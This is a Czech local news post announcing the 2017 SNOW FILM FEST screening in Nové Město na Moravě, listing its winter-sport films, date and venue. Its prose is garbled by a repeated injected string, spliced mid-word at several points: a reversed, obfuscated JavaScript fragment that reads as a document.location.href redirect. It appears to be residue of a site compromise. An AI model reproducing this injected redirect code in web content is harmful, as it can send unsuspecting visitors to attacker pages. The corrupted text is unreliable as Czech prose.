Rainbow page separator

SNOW FILM FEST v Novém Městě na Moravě již 5.11.2017

Úterý, 31. října 2017

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Celovečerní pásmo špičkových filmů o zimních sportech a dobrodružstvích v lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu zvítá i do Nového Města na Moravě. V programu je 7 pečlivě vybraných filmů – finalisté ze zahraničních festivalů a novinky z domácí produkce. Na své si přijdou milovníci čerstvého prašanu, horských velikánů, psích spřežení i arktické divočiny.

A o čem jsou le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošní filmy podrobněji?

 

Rasťo Hatiar ve svém filmu Obyčejní chlapci sleduje dodnes nepřekonané výkony skialpinistů působících v 90. Letech – Dušana Trizny a Milana Madaje.

Výstup na Link Sar zobrazuje odhodlání Jonathana Griffitha zdolat horu, která ho již čtyři roky odmítá. Film Dog power je ukázkou jedinečného pouta mezi člověkem a zvířetem a jejich společné radosti z pohybu.

Ven(ca) je reportáží z nejdrsnějšího závodu planety skrz zimní Yukon v podání extrémního spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovce Honzy Franckeho.

 

Pocit viny není jen o sportu a přírodě v divokém Grónsku, velkou roli hraje věda, ale i radost a zodpovědnost za lidské konání ve snaze snížit dopady ces[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tování na nejnižší možnou míru.

Pohádka Johna Shockleeho je pozitivní, inspirativní a zábavná, o [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom, že žít své sny lze v jakémkoliv věku. Ski for freedom je neziskový projekt, který má za cíl rozšířit lyžování v Pákistánu, poskytnout potřebné lyžařské vybavení a hledat talenty, kteří by se mohli zúčastnit zimních olympijských her v roce 2022.

Těšíme se na Vaši návštěvu! Dana Javorská

SNOW FILM FEST v Novém Městě na Moravě
Termín konání: 5.11. 2017 od 17 hodin
Mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to konání: Kulturní dům Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě